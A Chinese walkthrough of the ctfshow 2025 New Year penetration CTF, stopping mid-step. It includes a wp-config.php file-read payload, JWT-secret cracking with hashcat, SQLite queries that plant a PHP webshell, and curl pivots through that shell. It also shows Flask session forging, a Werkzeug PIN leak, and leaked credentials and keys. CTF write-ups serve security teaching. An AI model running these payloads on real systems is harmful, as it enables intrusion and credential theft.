ctfshow 2025元旦渗透赛复现

第一章

启程

任务应援包：

1
2
3

633246888504573920779824237508007735589231666589188021171575950939940255140086052090801972411182075806200277922264916256376952068104942084262732765302869757002336862151158422906662985191392193462511289187123754337854684702016396996198789908170728175626225281406256476216079863574750768787169969475152717430903460149705597463505143799487488630064694962535355825378265518133414832135165998125004282912865895836379205933895029154287788824317000843771251331435939410389957572552746410933103347212260533351406876584798128116835102705770834548333327952204414218313396767348386545933700371706780732081128764732828398879654027694999061445888984652196057717761623666471390226500419047354546009526849190038055817008252022472857695300387827500818231719929626707573775972451255428059119840669826086027702546510213791864358183204530776020004866770536545695330324167569777791175170044812028227494966458864002660598592490354017639158027968836329598282419666463285900175674408026881052737148611395153194390130628356104784358804158581294733196703476913434055209441802708485723455322985654447400945734717510509951259155462497189459983874690099575241597111904193711108488616566486665053884629084564364205319797812148684173057523812840684555544241901417
31764044218067306492147889531461768510318119973238219147743625781223517377940974553025619071173628007991575510570365772185728567874710285810316184852553098753128108078975486635418847058797903708712720921754985829347790065080083720032152368134209675749929875336343905922553986957365581428234650288535216460326756576870072581658391409039992017661511831846885941769553385318452234212849064725733948770687309835172939447056526911787218396603271670163178681907015237200091850112165224511738788059683289680749377500422958532725487208309848648092125981780476161201616645007489243158529515899301932222796981293281482590413681
19935965463251204093790728630387918548913200711797328676820417414861331435109809773835504522004547179742451417443447941411851982452178390931131018648260880134788113098629170784876904104322308416089636533044499374973277839771616505181221794837479001656285339681656874034743331472071702858650617822101028852441234915319854953097530971129078751008161174490025795476490498225822900160824277065484345528878744325480894129738333972010830499621263685185404636669845444451217075393389824619014562344105122537381743633355312869522701477652030663877906141024174678002699020634123988360384365275976070300277866252980082349473657

给了一张图片，但需要密码

ARCHPR爆破：

FLAG1：ctfshow{654321}

破解加密通讯

要求我们找到任务中心的地址

用winhex打开我们的图片：

aWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHRyeToKICAgICAgICBpbXBvcnQgc2VjcmV0TWVzc2FnZVJlc3BvbnNlCiAgICBleGNlcHQgSW1wb3J0RXJyb3I6CiAgICAgICAgaW1wb3J0IHBpcAogICAgICAgIHBpcC5tYWluKFsnaW5zdGFsbCcsICdzZWNyZXRNZXNzYWdlUmVzcG9uc2UnXSkKICAgICAgICBmcm9tIHNlY3JldE1lc3NhZ2VSZXNwb25zZSBpbXBvcnQgcHJpbnRNZXNzYWdl

base64解码：

if __name__ == '__main__':
    try:
        import secretMessageResponse
    except ImportError:
        import pip
        pip.main(['install', 'secretMessageResponse'])
        from secretMessageResponse import printMessage

这段代码的主要功能是：

检查 secretMessageResponse 模块是否存在。
如果不存在，则使用 pip 安装该模块。
然后从 secretMessageResponse 模块中导入 printMessage。

kali上运行：

应援包给的RSA的n、p、q，可以求出d，求私钥：

from Crypto.PublicKey import RSA

p=31764044218067306492147889531461768510318119973238219147743625781223517377940974553025619071173628007991575510570365772185728567874710285810316184852553098753128108078975486635418847058797903708712720921754985829347790065080083720032152368134209675749929875336343905922553986957365581428234650288535216460326756576870072581658391409039992017661511831846885941769553385318452234212849064725733948770687309835172939447056526911787218396603271670163178681907015237200091850112165224511738788059683289680749377500422958532725487208309848648092125981780476161201616645007489243158529515899301932222796981293281482590413681
q=19935965463251204093790728630387918548913200711797328676820417414861331435109809773835504522004547179742451417443447941411851982452178390931131018648260880134788113098629170784876904104322308416089636533044499374973277839771616505181221794837479001656285339681656874034743331472071702858650617822101028852441234915319854953097530971129078751008161174490025795476490498225822900160824277065484345528878744325480894129738333972010830499621263685185404636669845444451217075393389824619014562344105122537381743633355312869522701477652030663877906141024174678002699020634123988360384365275976070300277866252980082349473657
n=633246888504573920779824237508007735589231666589188021171575950939940255140086052090801972411182075806200277922264916256376952068104942084262732765302869757002336862151158422906662985191392193462511289187123754337854684702016396996198789908170728175626225281406256476216079863574750768787169969475152717430903460149705597463505143799487488630064694962535355825378265518133414832135165998125004282912865895836379205933895029154287788824317000843771251331435939410389957572552746410933103347212260533351406876584798128116835102705770834548333327952204414218313396767348386545933700371706780732081128764732828398879654027694999061445888984652196057717761623666471390226500419047354546009526849190038055817008252022472857695300387827500818231719929626707573775972451255428059119840669826086027702546510213791864358183204530776020004866770536545695330324167569777791175170044812028227494966458864002660598592490354017639158027968836329598282419666463285900175674408026881052737148611395153194390130628356104784358804158581294733196703476913434055209441802708485723455322985654447400945734717510509951259155462497189459983874690099575241597111904193711108488616566486665053884629084564364205319797812148684173057523812840684555544241901417
e=0x10001

#计算其他相关参数
phi=(p-1)*(q-1)
d=pow(e,-1,phi)

#生成私钥
key=RSA.construct((n,e,d,p,q))
#export_key() 将私钥导出为PEM格式字符串，便于存储或传输。
private_key=key.export_key()
print(private_key.decode('utf-8'))

用私钥解密，解密脚本：

import base64
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives import hashes

message={
    "inputMessage_20241216":'''gHgAsclUVPhWDv4S8Oa8SuRTDaj+V0dI4z2jrQwfvfSFWilWwMKwNULUI48UBLS2shZcm/yv2/e5Hq5VRDfXkdxCYQMdvdnvONtpm2yNiIaLpDV4Rs8fOXJ6kcaeT+mg4RkIIFgx35w4J1KgO72pSP8j1p+R9f9TNMafwJ91XmO4QTcOYkMKQMddKvhbyMXzJkSS0uZqEppNSIUnVX9b7m8PmMjV0uHShvb1Zc8UQWJWUJ3cOxwNasOeMQGxJrZXPkxIxDYzm3f0tXbCgvdgNZ8TQY7u+iCXjOtD6xnUsdSahnPq14BD30CilIfsG0r/klPHfxQ+psmHSX47Ylai0TtgfbHWJJ4lSo0ojMvTx6HYK8zmAoCmg4OGXDbv/IjJgYU1w24na0iXZCNtcjB9MLRNck00c20f/uS64Ss0Ixii8nmfsFOjQBCcIYN+HGmOnj5Uw8DVJrxlOmcfQciG3rzuIvYlbOdGMcyarTy2Ba7iZfoovYZObPscAwhNLWqbU4tuR78aOVxiXTFRY7+Y0x2eRT5sulcvB3vsKuDMlNrxaUgiFUohPBZGNsgQgyCPxxqk0NpUn0bbHLH+vBebjJxaim4AU28ctWW8xv7xpxVttb0EoohtK2cIHr79ep5XrU/rv4R58obD/o+QqI1Mrb4wwpX9tsL7ZbROw/MXJwM=''',
    "inputMessage_20240411":'''Z93Khatj+AWZcpPwIqu8LzbJ8xb8CuVMI8okE0qwoQD2IC2lixg77mJZireOrbW7zFkDsk1hP67dROJZwVUDrYot2g5GxX/xy7lGjIblUX4iJVUtP4mHqZUgKROaLoh/gippMpP+8Ik2X/QRBx5gdhq0xam+wuVC+77/tyu8Fd/DohKbAMp8aaJsFr/W4mLDZ1gv4JK+2O3l+bAvpodBRTzb0ld5zD2ueYvjTudoDjdanQP1oVTH7pkDO2Vb+SsdIyTi2C410JEOF4Qm8mzVHtiOunOcLVpAlQsM6/LdhqsTNelXl/Myb84NGxwGWVmx6j2QejiL7S1hHeHlmQ9ExHeURPdZAvKhgMCemYXu3BGlFq3ydb5SkqwLFvM4vJ6XUBcWkHT8eijBFF6Y7YgOv9GRvBTnsAQhUBp4W4EAMtXkDdToG+S8ZO7El8Gh8jaWC49n5CuUBRz3z2GeOVbsBamfLV06IO5v78jGHXig4saEFKHvYSIGewyUCVQEGoIR5xOTJBTUTePAdvQjfg28vZZxFB/hIYNDUHkaek1Mg1UH5HWGgsCX1In5hSX/9eBkznEhzeWnJ1yMsYkj+ddN34DLQSrHc83geXMcoW3Ah3cAQG8E8bszvKL3hme+T5rOeENjkOAgYhf84k4YlxDskdwvzyu8HkE9CSaBpDP6lKI=''',
    "inputMessage_20240305":'''ckDSthpl5DDJMpBE26Jqk8EjaSq7MUntdwLHPouwx6D38un6WQfLJ9wgDyjh9GA/ICJR7WrwWsVinr6y3u9w+ubMZ0mqmtnphzQraagk8NkKc1u1+qGp8llsud3C8mvJWa4GYa9KEhnACDHwppPKJDCfr1HKwPbR0NIi+1Aunmy6DeOKRkFwysnrSco5QiiC9+gdXFhQDmN9KEiYW6Pc3mWVbqFiJgRW3/Df6638oGPm6AUcgRnEWMKiluyN81frM9VNtCeJ64YrU6Rgx4D153YxNNQbLTcyCQMamHTrJnhxPojkuDqbEcU+iiN4offwrQyr4eEu9ecvmyD2w/n7pAOsVnqSzroBujVA+CK6Zq8Uie15mL5yWG9hD5ZcbSwnRmtqK3yl0Xl91hgn1JqcIEKtf+MnMQPr80uoxT3mz8IX8pyVnyyw1x6F+IK1I2G+5w6rUDjhzIbME5XB9hopwcswsXrMo9PP6/5Sz1noJrsu6k6WN8ZM0MyRIav+xuKP1+cYzlPSQZrMo3L4ieHQnBbsoyzGVf9QONMwaooGOrxu88ZWlGe8e7eyCzteeNSVOC2zqtQiwQJIgfp2UwTymA/cEjOICWVzUXwbE5wWUBPCLp2C/XWc82byrOHAFXHLOVKgolVToUpZ5uOvizgk/ahaxdGxGa9CrRyr6sf+goA=''',
}

backend='''
-----BEGIN RSA PRIVATE KEY-----
MIIJKQIBAAKCAgEAmziayo9Tddo1FYdrtOswyjLYJ5frYKEwm4rQTsKU8UcdnnDR
gms+ZmStoqlH/qi6x+D1K3fvvioCnGZLFHZwBUqbgT5x+qUmUaVMll9FOT7ZJ05w
8n8Ljqa1akzFMU5G7YbCr3vQwN63vwvD9/63TDbXkJrv1fGl2rHpPwp5OPCUeCB3
nIFIRCWHpJU7sHJqIP5vzV8KNJtbxgR+dhszdg+NhoBDUpxoVN5lzSKr2TMOLFLZ
aQR9AWOV/aHV8gjTkTLDZfc+XlfhxiDMTQdiUTbk/tynpt+JFrDA8vL5/TOmuxgu
mqgXZIPGrIUbwloTYyHD/XXmvXu5KE8g3eMKgxNxuEKM5bMTESBK9A7Q2Kj3eNp0
Rvb5Aleg7h8/YbQemGelY/o5xpUyHgHjsfNQ3j/xhdhVCNVaXZF64V/YVpvC9Cq2
9F7qI+bl6FlN7zSpuHB3QgNS1uXOmjBCsA7ypZoWmdXeaLIO+I3kP48BBSmue4ni
dJifiK/kSOcZ0iegRXV1hyZ6pYdDE7hM5V5t5tvayJ31zRQNT2ALAFeCDozVWELH
TnphkPkQO+SOPglrVz0S1dXicqRofXWMj7PJOFkBpWIX0aywMIh1woEAawUs3RM2
pfLUNtqUTfodSCmWlwcpGrBWG5NACx7csPFtzWn8oPZfzL346at5DDIwD2kCAwEA
AQKCAgA+oGYD2DQqVrIYT50rT8FNs5n2z5rOT/rWpvlI7cU+XB0dMhO19SMmGPTd
rkM4AkfqIV+J/Egkh7qp87PTO74SxHldeh5urHd7daAjA6lgYXUoIMP9czjsg2Kq
0vK05ApGB5tBRkmBp9qnIE4fHwxBmdb7pyehQHBUfnfHUah7SsX8ec0Ivji0FhhW
VUfR9zfOvBnL2M67TvuGN4X2jR8EQV4uqE2BZU3LADg+vgBsD+dmBr9lWcQ97To1
LTivANSrvrmLyGfHlNmpIM6NPa9zaRyXn9ucvpAHMaWH4HTwrghVcHpNOAjIK0rb
jJEYp1MvKg5zk0BXrzWTh+mQ3Ov+NXrbdDspmeZsY02SuyPheOBHHHs7cHANPcRH
1Nl/nxXkRF9H+oSOmTQi7wjZbhrEFFCeCK2TuT8vyf0p+lQMPEc+cAFn5rSXnhii
W2Mq6nwx5Nbllr/hj7oVeyGrUZFskvbZnYYVM4NTFqUPBzQbBuQTGGfccZc9OrJx
2qpDZdUknQe9ZI742c2vZRTqY2yZX6InR8JoQbmscke4LRdUMHH6G/PbfkqPXfFy
r5mxscghP+kRFj86dyL03CB039N23xCNezK/AGE/6JzJgwpvUPaYtvnIuhSFQEmH
DGrYYrDXSbwTT0ufM/tIEuHMHXT4DYX3nm94SG8wB/b3zpFdAQKCAQEA+56kjWCg
Wcjo+QUgp50+BIa5hkFoV16QOCQEsqh+s5rhVMke7svuo5+U6C/rNFIkpR1iKRPL
3LOqJ8B5P7ZAPdhbHAPjdtnUDbPzM1r0RYpjbJPh4AcRVqhDTWy20Yd7iZN9mHxH
SKBZ4Txn20gvkHamPVlPMejsDRpDoauS/euzn2GlG9GPq7i5vHwQiy6sYZAPm9Ey
z+XxsQNiqB32tHnZqYrj/GS64Jx6eaa5MdSCLIPkHHWAUHzBQ5A8/bNTFf8VAYri
R9GnTZF8oSNne6oD62IYVzDH2wWOWSnUKdAdsnaahJLvHQnWbz6itWPWj+2TrjLS
nl9Tz7uuhrRjcQKCAQEAnexbL5Sov7N4W7BrZZao8cKEnM6goDpUjqgEnlIG4FF+
UVmBzuAYNlLjOXW7fKK6nt5q95R1AA72FpfOHbZnTTYHm9u1zUecIeuvNVjxi9sw
hmhMn43pxaQcUfgWSsCrqH+8SrVEz8Lc7V2lbswx/V94PC8Za7ZLSr+FOz6X7C71
sLQR8XI3SkrZIkmL150N8LO4WdKAtKKIfvz7Lo2xLxpGLNJ3Xf/NW51wMs5BwQNz
EUWRUmkgCmeU74m47TCSOj580qLLT0Hxj1jRhecZOs0DHqDCeHt0hz82EtOcw1TB
JKTly3Xj/UjGRpzEmo8rAuU8XoKc/NkmaZCjpxh/eQKCAQEArbI5E+OFLhXURbs1
bJ/OpR8/yR8z4URFOIwcthw8ws2DCZ2A/gXHaiqKh7I0oryl0Vm0Xnjs/SEFsEVd
Lg8oz8igNHm2t1/t07vKgkQiZjL/KX/4qEcYwAKN20/V8FSfgjxPskjwiIExKpwh
ca2mMArH/Ye+dMy+zti3oU4ovaLNL5Qff1Gt5TQy+5uFbB8/HmZtb/n9IqkwrCqT
G0z79mA7Up+vfJcork82+O2P4Ic7iXFOshqnBmjonTRf9h6pl4CsRpFSXZOr848g
QriHAkY+SGpCNUZWYKq4NnL6pBanuX/IcQZhjGEzJz5M4fzWrCqsDM/Gt09FMxzz
gMfb8QKCAQEAhnF+W65yTulKELzLYWv2ngLchOY/xsiBzgTqEaKBahzWrgjGQsly
s2SzPuqk14Ft4Ow3IljHlmomRKut9IuhvBDAP4a3anCJUjNkMMVstYS/9dz7RmY5
W2HQHlRXHgKS4NsGAI/7aehZztYHjaDW+f55zLrIKHPD+3m6weoSyiZcUberAuMa
gOvhmJgGLmPtRzqpOgbEPYOVMo7KhCJqclAq5+OxbVvlhxYsO4RuZBQ8tLqF8iO+
/DychaS4w2yzQFSMTYH8FZhtPnz9usI4L1/zRPLVPF7VoIJG1ZZDgeM4nqqnWyQd
GTcIXXr+wRobItbnIwqM/ZEca4iQWiO3+QKCAQAjp153c8JvZhR3Stan0bKYHzMm
FWEUjmygq6xgzclvkWWYmHwHvYjO4tITXHSmEt5GrUY/W1LOA0x9HRMUh7p71tw6
7ni/lELMlT6Sk3b32SRoftEr5SmNEZlXPh2UYC260FkXNj3hhShv7DAZyV2bthqk
YV63M7neAAU5YPmq0uvMvxHv1D17bswwbiJ3mzb/E4CSR2gDkKrZGshtJbKUtLvb
wEigkCIjw+UFRhLiK4R+OIL7bZtE2unbYWeL1h4w1BLwFJPg/26Gnq91V96GwoKf
JiAEy9wfJBnCwJPdr9OV9GGrMfBRF8Rkl6YyvNNb21C6ZABBuAzWpfu0I60h
-----END RSA PRIVATE KEY-----
'''

def decrypt_message(encrypted_base64,private_key_pem):
    # 加载私钥
    private_key=serialization.load_pem_private_key(
        private_key_pem.encode(),
        password=None,
        backend=default_backend()
    )
    
    #base64解码密文
    encrypted=base64.b64decode(encrypted_base64)
    
    #使用私钥解密
    decrypted=private_key.decrypt(
        encrypted,
        padding.OAEP(
            mgf=padding.MGF1(algorithm=hashes.SHA256()),
            algorithm=hashes.SHA256(),
            label=None
        )
    )
    
    #解码base64获取原始信息
    original_message=base64.b64decode(decrypted).decode('utf-8')
    return original_message

#解密所有信息
for data,encrypted_msg in message.items():
    print(f"\n解密{date}:")
    try:
        decrypted=decrypt_message(encrypted_msg,backend)
        print(decrypted)
    except Exception as e:
        print(f"解密失败:{str(e)}")

解密inputMessage_20241216:
Park:
你的行动已经暴露，24小时内迅速撤离，销毁所有资料，将现有资料统一上传到【任务中心】
发送人：Dylan

解密inputMessage_20240411:
Park:
总部已经为你安排新的身份，请务必在3日内抵台，你的新身份是新竹县动物保护防疫所网络安全顾问，【任务中心】账号密码和你任职单位网站的数据库用户名密码一致，请尽快修改 
发送人：Dylan

解密inputMessage_20240305:
Park:
【任务中心】网址已变更为 https://task.ctfer.com ，请注意修改浏览器地址栏中的链接 
发送人：Dylan

flag2：ctfshow{https://task.ctfer.com}

潜入敌营

这里需要账户密码

通过你的新身份是新竹县动物保护防疫所网络安全顾问搜索网站。

1	https://apc.hsinch.gv.tw/

可以看到插件是wordpress，利用kali自带wpscan可以扫出漏洞poc，第一次用需要注册登录官网获取token

1	wpscan --url https://apc.hsinch.gv.tw/ --api_token sWXaPLV1Doham43h0uiyVIKtTAKh34kIloIo07DAIeY

payload:

1	https://apc.hsinch.gv.tw/?aam-media=wp-config.php

得到数据库信息：

define( 'DB_NAME', 'hsinchug_wp1' );

/** MySQL database username */
define( 'DB_USER', 'hsinchug_wp1' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Q.4Vyj8VCiedX1KYU5g05' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' ); 

define('AUTH_KEY',         'o8wpc6n66l270a8axjrmhcy5afl8ttgf8bj9lm3hji103rchpgw88f0wuxjfcwqd');
define('SECURE_AUTH_KEY',  '3jbho525q0dabjkgcpkg2yvuncwganxcjas0ikq7drgxa62my8h6tvut4a34pujx');
define('LOGGED_IN_KEY',    '1acslrj7hblucj7nnnsvi91t8v77kf8jl7omi5gfc3v8nvca46lndpchjtqd27jq');
define('NONCE_KEY',        'b6nacyj0crhfol2hs6gbqx71w957dn9al8hrjgrydf3rora6jcw2olw4sc3736aw');
define('AUTH_SALT',        'vl5vc4gy92ciqvbflfc5o4227jabrktlir61urdxal2fgl9xfokt21usbr28625v');
define('SECURE_AUTH_SALT', '7qljoppn8bcdggacnvi53616r5iyy4yr7qduyj0up3x1nv1o345t591bitfxod3a');
define('LOGGED_IN_SALT',   'g50jlcgt1qyy031blxcahqm1f20jfypw53jxxg83a67c73ir3dod3irbbguis13k');
define('NONCE_SALT',       'l5pti50j2wrxwrkclijp66x24r53auvf7kknsq7w733fr18x7my8lawm0p4hgtph');

或者根据插件版本找到payload

flag3：ctfshow{hsinchug_wp1_Q.4Vyj8VCiedX1KYU5g05}

第二章

秘密潜伏

需要提交dylan的电话号码

登录任务中心：

1
2
3

账号：hsinchug_wp1
密码：Q.4Vyj8VCiedX1KYU5g05
地址：第一章潜入敌营开启的地址

放了半天只看到一个照片和一串公钥：

而根据题目中提示的jwt就说的通了，key应该是密钥，我们需要伪造jwt登录dylan的账号：

利用hashcat将遮挡的字符爆破出来：

hashcat -a 3 -m 16500 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoc2luY2h1Z193cDEiLCJleHAiOjE3NDA2NjYyNTN9.868RYTiNArIpe3OjqMFKL9XcKzzEIjzMlagbBlw6DT0 --custom-charset1=?l?d 4a4f7d6e8b5?1?1?10c7f

QQ20250227-180440

密钥为：

1	4a4f7d6e8b5e3a0c7f

抓显示电话号码的包修改jwt即可：

flag4：ctfshow{117447685307}

收集敌方身份信息

这里要知道root的密码

知道jwt密钥后我们就可以访问https://task.ctfer.com，通过伪造jwt来登录dylan账号

而在dylan账号中多了一个Administrator，里面有两个路由分别为：

1
2
3

/listTaskFiles?path=

/readTaskFile?path=&file_name=

第一个路由用于看指定目录的文件，而path参数用来指定目录：

同样需要伪造jwt才能访问。

测试发现过滤了/和\，但没过滤.，所以可以通过.看当前目录下的文件：

QQ20250227-200130

而第二个路由用于看指定目录的指定文件，path指定目录，file_name指定文件：

main.py.bak:

from flask import Flask, request, jsonify, session
from flask import url_for
from flask import redirect
import logging
from os.path import basename
from os.path import join

app = Flask(__name__)

# 设置 Flask 应用的密钥，用于加密会话等
app.config['SECRET_KEY'] = '3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5'


# 定义根路由，处理 GET 请求
@app.route('/', methods=['GET'])
def index():
    # 在会话中设置用户为 guest
    session['user'] = 'guest'
    return {'message': 'log server is running'}


# 检查会话中的用户是否为 admin
def check_session():
    if 'user' not in session:
        return False
    if session['user'] != 'admin':
        return False
    return True


# 定义 /key 路由，处理 GET 请求，获取特定文件中的密钥
@app.route('/key', methods=['GET'])
def get_key():
    if not check_session():
        return {"message": "not authorized"}
    else:
        # 尝试打开文件读取密钥
        with open('/log_server_key.txt', 'r') as f:
            key = f.read()
        return {'message': 'key', 'key': key}


# 定义 /set_log_option 路由，处理设置日志选项的请求
@app.route('/set_log_option')
def set_log_option():
    if not check_session():
        return {"message": "not authorized"}

    # 从请求参数中获取日志名称和日志文件名称
    logName = request.args.get('logName')
    logFile = request.args.get('logFile')

    # 获取日志记录器并添加文件处理器
    app_log = logging.getLogger(logName)
    app_log.addHandler(logging.FileHandler('./log/' + logFile))
    app_log.setLevel(logging.INFO)

    # 清空日志文件内容
    clear_log_file('./log/' + logFile)
    return {'message': 'log option set successfully'}


# 定义 /get_log_content 路由，处理获取日志内容的请求
@app.route('/get_log_content')
def get_log_content():
    if not check_session():
        return {"message": "not authorized"}

    # 从请求参数中获取日志文件名称
    logFile = request.args.get('logFile')
    # 拼接文件路径
    path = join('log', basename(logFile))
    with open(path, 'r') as f:
        content = f.read()
    return {'message': 'log content', 'content': content}


# 清空指定文件内容的函数
def clear_log_file(file_path):
    with open(file_path, 'w'):
        pass


if __name__ == '__main__':
    # 运行 Flask 应用，开启调试模式，监听所有 IP 地址，端口为 8888
    app.run(debug=True, host='0.0.0.0', port=8888)

init_users.json记录了所以用户名和密码：

{
    "hsinchug_wp1": {
        "username": "hsinchug_wp1",
        "password": "Q.4Vyj8VCiedX1KYU5g05"
    },
    "dylan": {
        "username": "dylan",
        "password": "8f7a55c6d9a7d9a7"
    },
    "secret_user": {
        "username": "root",
        "password": "7y.(sc#Ac_"
    }
}

flag5：ctfshow{7y.(sc#Ac_}

横向渗透

需要提交 DATABASE_SECRET_KEY内容

直接登录dylan账号，server info有内网地址：

访问/downloadTaskFile?url=路由，用获取的IP扫c段：

<!DOCTYPE html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Database TEST</title>
    <script>
        const DATABASE_SECRET_KEY = '0x8F7C71E8E82E4D1E';
    </script>
</head>
<body>
    <h1>Welcome to Database TEST</h1>
    <p>This is a test page for database connection and queries.</p>
    <form action="index.php" method="get">
        <label for="name">Enter Database username:</label>
        <input type="text" id="name" name="username" required>
        <br><br>

        <label for="password">Enter Database password:</label>
        <input type="password" id="password" name="password" required>
        <br><br>

        <label for="dsn">Enter Database DSN:</label>
        <input type="text" id="dsn" name="dsn" required>
        <br><br>

        <label for="query">Enter TEST Query:</label>
        <input type="text" id="query" name="query" required>
        <br><br>

        <input type="submit" value="Submit">
    </form>
</body>
</html>

flag6：ctfshow{0x8F7C71E8E82E4D1E}

第三章

跳岛战术

需要拿到config.php中的数据库密码

提示我们渗透进内网php服务器，而上面我们获取的服务器就是php环境，估计config.php就在这上面。

该表单接受4个参数，username、password、dsn和query

hint:

1
2

&
sqlite

sqlite和mysql等还是有些区别的，sqlite的每一个数据库就是一个文件。

先创建一个users表，包含字段name，利用PDO连接数据库的dsn，并将数据库文件命名为1.php:

1	/?username=1&password=1&query=CREATE TABLE users (name TEXT);&dsn=sqlite:1.php

尝试写马：

1	/?username=1&password=1&query=INSERT INTO users (name) VALUES ('<?php file_put_contents("cmd.php","<?php system(\$_GET[0]);?>");?>');&dsn=sqlite:1.php

建议在burp上进行

再访问1.php执行马：

1 2	/1.php /cmd.php?0=cat config.php

<?php

//数据库连接配置
$database_host = "localhost";
$database_user = "root";
$database_password = "3f7a1d5a-d55d-4d9d-8d9a-d5d5d5d5d5d5";
$database_name = "web_db_2";

?>

index.php:

<?php
$pdo =null;

$dsn = $_GET['dsn'];
$username = $_GET['username'];
$password = $_GET['password'];
if($dsn && $username && $password){
    $pdo = pdo_init($dsn, $username, $password);
    if($pdo === null){
        echo "database init faild";

    }else{
        $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
        $sql = $_GET['query'];
        $stmt = pdo_query($pdo, $sql);
        pdo_close($pdo);
        if($stmt!==null){
            echo "database test success";
        }else{
            echo "database test error";
        }
    }
}


function pdo_init($dns, $username, $password){
   
    try{
        $pdo = new PDO($dns,$username, $password);
        $pdo->query("set names utf8");
        return $pdo;
    }catch(PDOException $e){
        echo "数据库连接失败：".$e->getMessage();
        exit();
    }
}


function pdo_query($pdo, $sql, $params=array()){
    try{
        $stmt = $pdo->prepare($sql);
        $stmt->execute($params);
        return $stmt;
    }catch(PDOException $e){
        echo "数据库操作失败：".$e->getMessage();
        exit();
    }
}


function pdo_close($pdo){
    $pdo = null;
}

?>

flag7：ctfshow{3f7a1d5a-d55d-4d9d-8d9a-d5d5d5d5d5d5}

邮箱迷云

要求提交park在2024年12月27日19时20分收到的邮件中的数字

通过上传的马执行RCE我们发现根目录下有个secret.txt文件：

1 2	YUdGamEyVnlYMk4wWm5Ob2IzZEFNVFl6TG1OdmJTOUk= WVdOclpYSmZZM1JtYzJnd2R3PT0=

分别base64解码：

1 2	aGFja2VyX2N0ZnNob3dAMTYzLmNvbS9I YWNrZXJfY3Rmc2gwdw==

拼接起来进行base64解码：

1	hacker_ctfshow@163.com/Hacker_ctfsh0w

这是163邮箱的账号密码

flag8：ctfshow{hacker_ctfshow@163.com_Hacker_ctfsh0w}

第四章

再下一城

需要提交log_server_key.txt内容

之前的main.py.bak提到了log_server_key.txt

from flask import Flask, request, jsonify, session
from flask import url_for
from flask import redirect
import logging
from os.path import basename
from os.path import join

app = Flask(__name__)

# 设置 Flask 应用的密钥，用于加密会话等
app.config['SECRET_KEY'] = '3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5'


# 定义根路由，处理 GET 请求
@app.route('/', methods=['GET'])
def index():
    # 在会话中设置用户为 guest
    session['user'] = 'guest'
    return {'message': 'log server is running'}


# 检查会话中的用户是否为 admin
def check_session():
    if 'user' not in session:
        return False
    if session['user'] != 'admin':
        return False
    return True


# 定义 /key 路由，处理 GET 请求，获取特定文件中的密钥
@app.route('/key', methods=['GET'])
def get_key():
    if not check_session():
        return {"message": "not authorized"}
    else:
        # 尝试打开文件读取密钥
        with open('/log_server_key.txt', 'r') as f:
            key = f.read()
        return {'message': 'key', 'key': key}


# 定义 /set_log_option 路由，处理设置日志选项的请求
@app.route('/set_log_option')
def set_log_option():
    if not check_session():
        return {"message": "not authorized"}

    # 从请求参数中获取日志名称和日志文件名称
    logName = request.args.get('logName')
    logFile = request.args.get('logFile')

    # 获取日志记录器并添加文件处理器
    app_log = logging.getLogger(logName)
    app_log.addHandler(logging.FileHandler('./log/' + logFile))
    app_log.setLevel(logging.INFO)

    # 清空日志文件内容
    clear_log_file('./log/' + logFile)
    return {'message': 'log option set successfully'}


# 定义 /get_log_content 路由，处理获取日志内容的请求
@app.route('/get_log_content')
def get_log_content():
    if not check_session():
        return {"message": "not authorized"}

    # 从请求参数中获取日志文件名称
    logFile = request.args.get('logFile')
    # 拼接文件路径
    path = join('log', basename(logFile))
    with open(path, 'r') as f:
        content = f.read()
    return {'message': 'log content', 'content': content}


# 清空指定文件内容的函数
def clear_log_file(file_path):
    with open(file_path, 'w'):
        pass


if __name__ == '__main__':
    # 运行 Flask 应用，开启调试模式，监听所有 IP 地址，端口为 8888
    app.run(debug=True, host='0.0.0.0', port=8888)

而通过爆破可以测出8888端口的flask服务：

而访问时发现有cookie：

毫无疑问session伪造了，密钥给了：

1	3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5

session伪造工具：https://github.com/noraj/flask-session-cookie-manager

1	python flask_session_cookie_manager3.py encode -s '3f7a4d5a-a71a-4d9d-8d9a-d5d5d5d5d5d5' -t '{"user":"admin"}'

1	cookie:session=eyJ1c2VyIjoiYWRtaW4ifQ.Z8GZPw.oghi9Bx5tY2_9wiz02eJ9RUdxP4

拿到伪造的cokie后直接访问是不行的，这里需要我们利用之前写的马通过curl命令将cookie带过去：

1	http://172.2.237.5/cmd.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z8GZPw.oghi9Bx5tY2_9wiz02eJ9RUdxP4" http://172.2.237.6:8888/key

flag9：ctfshow{4f5d1d5d-1d5d-1d5d1d5d1d5d}

顺藤摸瓜

需要提交flask所在服务器的/etc/passwd 文件最后一行内容

main.py.bak可以看到debug为true，或许可以打pin码泄露。

访问/console路由：

可以看到用了Werkzeug，同时console的key：

1	motSXRASEKviSbHLumrO

下面需要创建一个日志文件，将pin码打印在文件上

而设置loggername为werkzeug记录flask的日志（可在logdict里看）

1	http://172.2.237.5/cmd.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z8GZPw.oghi9Bx5tY2_9wiz02eJ9RUdxP4" "http://172.2.237.6:8888/set_log_option%3flogName=werkzeug%2526logFile=main.log"

这里可以通过printpin来泄露pin码。

http://172.2.237.5/cmd.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z8GZPw.oghi9Bx5tY2_9wiz02eJ9RUdxP4"  "http://172.2.237.6:8888/console%3f__debugger__=yes%2526cmd=printpin%2526s=motSXRASEKviSbHLumrO"

查看我们的日志文件：

1	http://172.2.237.5/cmd.php?0=curl -b "session=eyJ1c2VyIjoiYWRtaW4ifQ.Z8GZPw.oghi9Bx5tY2_9wiz02eJ9RUdxP4" "http://172.2.237.6:8888/get_log_content?logFile=main.log"

拿到pin码：

1	834-059-141

然后用pin码进行验证，将cookie保存在本地：

